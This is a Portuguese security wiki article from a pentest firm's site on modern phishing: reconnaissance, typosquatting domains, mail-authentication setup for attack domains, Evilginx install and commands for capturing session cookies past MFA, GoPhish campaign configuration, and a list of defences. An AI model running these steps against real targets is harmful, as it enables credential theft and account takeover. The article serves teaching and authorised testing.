// INICIALIZANDO SISTEMA...
Falar no WhatsApp

Utilizamos cookies essenciais para o funcionamento do site. Ao continuar, você concorda com nossa Política de Privacidade e com a LGPD.

CyberZ
Fale Conosco
CyberWiki / Engenharia Social / Phishing — Técnicas e Infraestrutura
● Intermediário 25 min de leitura Phishing Email Evilginx AiTM MFA Bypass GoPhish SPF DKIM DMARC

Phishing — Técnicas e Infraestrutura

Phishing é responsável por mais de 90% dos incidentes como vetor inicial. Phishing moderno bypassa MFA via proxies adversary-in-the-middle, usa domínios similares com SSL válido e personalização via OSINT. Entender a infraestrutura completa é essencial para defesa efetiva.

Anatomia de um Ataque Moderno

1. OSINT e reconhecimento
   - Coletar emails: Hunter.io, LinkedIn, theHarvester
   - Identificar stack de email (MX records)
   - Pesquisar funcionários, cargos, projetos atuais
   - Identificar fornecedores e parceiros (para pretexto)

2. Infraestrutura
   - Registrar domínio typosquatting similar ao alvo
   - Configurar SSL/TLS (Let's Encrypt — grátis)
   - Configurar SPF, DKIM, DMARC para passar filtros
   - Warm-up do domínio (enviar emails legítimos antes)
   - Servidor de redirecionamento (Evilginx ou GoPhish)

3. Conteúdo
   - Clone da página legítima (HTTrack)
   - Personalização com dados OSINT da vítima
   - Pretext: urgência, autoridade, medo, ganância

4. Entrega e captura
   - Email com From spoofado ou domínio similar
   - Evilginx captura session cookies (bypassa MFA)
   - GoPhish rastreia abertura, clique e credenciais

Typosquatting — Domínios Confundíveis

-- Técnicas:
alvo.com → alv0.com          (0 no lugar de o)
alvo.com → aivo.com          (i no lugar de l)
alvo.com → аlvo.com          (а cirílico — IDN homograph)
alvo.com → login-alvo.com
alvo.com → secure-alvo.com
alvo.com → alvo-support.com
alvo.com → alvo.com.br.atacante.net

# Gerar variantes automaticamente:
dnstwist -r alvo.com

# Verificar disponibilidade e registrar
whois alvo0.com

SPF, DKIM e DMARC — Bypasses

-- SPF: lista IPs autorizados a enviar pelo domínio
-- Verificar: dig TXT alvo.com | grep spf
-- "v=spf1 include:google.com ~all" → softfail = emails falhos podem passar

-- DKIM: assinatura criptográfica
-- Verificar: dig TXT selector._domainkey.alvo.com

-- DMARC: política de falha
-- "v=DMARC1; p=none" → apenas monitora, não bloqueia!
-- "p=quarantine" → vai para spam
-- "p=reject" → bloqueia completamente

-- Muitas empresas têm p=none ou nem têm DMARC
-- Sem DMARC: From: [email protected] pode ser spoofado

-- Verificar:
python3 -m checkdmarc alvo.com

-- Configurar no domínio de ataque (para passar filtros):
-- SPF:   v=spf1 a mx ip4:SEU_IP -all
-- DKIM:  configurar no MTA (Postfix + opendkim)
-- DMARC: v=DMARC1; p=none; rua=mailto:[email protected]

Evilginx — Bypass Completo de MFA

-- Reverse proxy AiTM (Adversary-in-the-Middle)
-- Captura session cookies pós-autenticação
-- Bypassa: TOTP, SMS OTP, push notification
-- Não bypassa: FIDO2/Passkeys (vinculado ao domínio)

-- Como funciona:
1. Vítima acessa proxy (login.microsoftonline.com.atacante.com)
2. Proxy faz forward para Microsoft real
3. Vítima faz login + MFA legitimamente
4. Proxy captura session cookie autenticado
5. Atacante usa cookie sem credenciais/MFA

-- Instalação:
git clone https://github.com/kgretzky/evilginx2
cd evilginx2 && make
./evilginx2 -p ./phishlets -developer

-- Comandos básicos:
evilginx2 > phishlets hostname o365 login.alvo.atacante.com
evilginx2 > phishlets enable o365
evilginx2 > lures create o365
evilginx2 > lures get-url 0    # URL a enviar para vítima
evilginx2 > sessions            # ver sessões capturadas
evilginx2 > sessions 1          # ver credenciais + cookies

-- Phishlets disponíveis: O365, Gmail, LinkedIn, GitHub, Okta

GoPhish — Campanhas de Red Team

# Instalar e executar
wget github.com/gophish/gophish/releases/.../gophish-linux-64bit.zip
unzip gophish && ./gophish
# Admin: https://127.0.0.1:3333

# Fluxo de configuração:
# 1. Sending Profile — SMTP (Amazon SES, Sendgrid)
# 2. Landing Page — clone + formulário de captura
# 3. Email Template — corpo do email com {{.URL}}, {{.FirstName}}
# 4. Users & Groups — CSV com nome,email
# 5. Campaign — combinar tudo + agendar

# Métricas rastreadas:
# Email Sent → Opened (pixel) → Link Clicked → Credentials Submitted → Reported

# Cada link é único por usuário → rastreamento individual

Tipos de Phishing por Canal

  • Email Phishing — mais comum; escala facilmente; filtros melhoraram mas não são 100%
  • Spear Phishing — altamente personalizado; taxa de sucesso 3-5x maior que phishing genérico
  • Smishing (SMS) — filtros SMS são piores que email; usuários menos céticos no SMS
  • Vishing — por voz; contorna todos os filtros técnicos; muito efetivo com pretexto bem construído
  • QR Code Phishing (Quishing) — substitui link por QR code; passa por scanners de email que não analisam imagens
  • LinkedIn/WhatsApp — canal mais confiável para vítimas; empresa raramente monitora

Prevenção

  • FIDO2/Passkeys — única proteção efetiva contra AiTM; chave vinculada ao domínio real
  • DMARC p=reject — impede spoofing do domínio; monitorar relatórios de rejeição
  • Email Security Gateway — sandbox de links e anexos em tempo real (Proofpoint, Mimecast)
  • Treinamento com Simulações — campanhas de phishing simulado mensais; treinamento imediato para quem cair
  • Conditional Access — bloquear sessões de dispositivos não gerenciados mesmo com token válido
  • Monitoramento de Domínios — alertas para registros de typosquats do domínio corporativo
Quer testar isso na prática?
A CyberZ realiza testes autorizados de segurança usando as técnicas descritas neste artigo — e muito mais. Identifique suas vulnerabilidades antes que os invasores o façam.
Falar com Especialista